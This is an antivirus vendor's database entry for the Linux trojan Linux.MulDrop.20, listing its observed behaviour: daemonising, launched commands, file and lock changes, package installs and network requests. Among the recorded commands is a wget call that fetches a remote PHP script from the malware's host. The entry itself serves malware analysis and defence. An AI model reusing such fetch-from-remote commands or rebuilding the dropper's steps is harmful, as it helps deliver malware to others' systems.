Linux.MulDrop.20
Added to the Dr.Web virus database:
2017-11-12
Virus description added:
2017-11-12
Technical Information
Malicious functions:
Launches itself as a daemon
Performs process tracing:
- <SAMPLE>
- <SAMPLE_FULL_PATH>
Launches processes:
- /bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
- <SAMPLE_FULL_PATH>
- /bin/bash <SAMPLE_FULL_PATH> -c
- wget http://sbts-script.com//rectussc/dosyalar/sinusbotverison.php -q -O -
- ip addr
- tail -n1
- grep state UP -A2
- cut -f1 -d/
- awk {print $2}
- wget /rectussc/dosyalar/sbguncelle.php -q -O -
- grep -c ok installed
- dpkg-query -W -f=${Status} curl
- apt-get -y install curl
- /usr/bin/dpkg --print-foreign-architectures
- /usr/lib/apt/methods/http
- /usr/bin/dpkg --assert-multi-arch
- /bin/sh -c /usr/bin/apt-listchanges --apt || test $? -ne 10
- /usr/bin/apt-listchanges --apt
- /bin/sh -c /usr/sbin/dpkg-preconfigure --apt || true
- /usr/sbin/dpkg-preconfigure --apt
- locale charmap
- sh -c stty -a 2>/dev/null
- stty -a
- /usr/bin/dpkg --status-fd 17 --unpack --auto-deconfigure /var/cache/apt/archives/libcurl3_7.38.0-4+deb8u5_amd64.deb /var/cache/apt/archives/curl_7.38.0-4+deb8u5_amd64.deb
Kills the following processes:
- <SAMPLE>
- <SAMPLE_FULL_PATH>
- /usr/lib/apt/methods/http
Performs operations with the file system:
Modifies file access rights:
- /var/log/apt/term.log
- /var/log/apt/history.log
Creates or modifies files:
- /var/lib/dpkg/lock
- /var/cache/apt/archives/lock
- /var/cache/apt/archives/partial/libcurl3_7.38.0-4+deb8u5_amd64.deb
- /var/cache/apt/archives/partial/curl_7.38.0-4+deb8u5_amd64.deb
- /var/lib/apt/listchanges.db
- /var/log/apt/term.log
- /var/log/apt/history.log
Locks files:
- /var/cache/debconf/config.dat
- /var/cache/debconf/passwords.dat
- /var/cache/debconf/templates.dat
Network activity:
Establishes connection:
HTTP GET requests:
- sb#########.###//rectussc/dosyalar/sinusbotverison.php
- ft#.##.######.#######ian/pool/main/c/curl/libcurl3_7.38.0-4%2bdeb8u5_amd64.deb
- ft#.##.######.######bian/pool/main/c/curl/curl_7.38.0-4%2bdeb8u5_amd64.deb
DNS ASK:
- sb###script.com
- ft#.##.debian.org
Other:
Collects CPU information
Collects RAM information
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
このウェブサイトを継続して訪問する場合、訪問者に関する統計データを収集するためのCookieファイルおよび他のテクノロジーを弊社が利用することに同意したものとします。詳細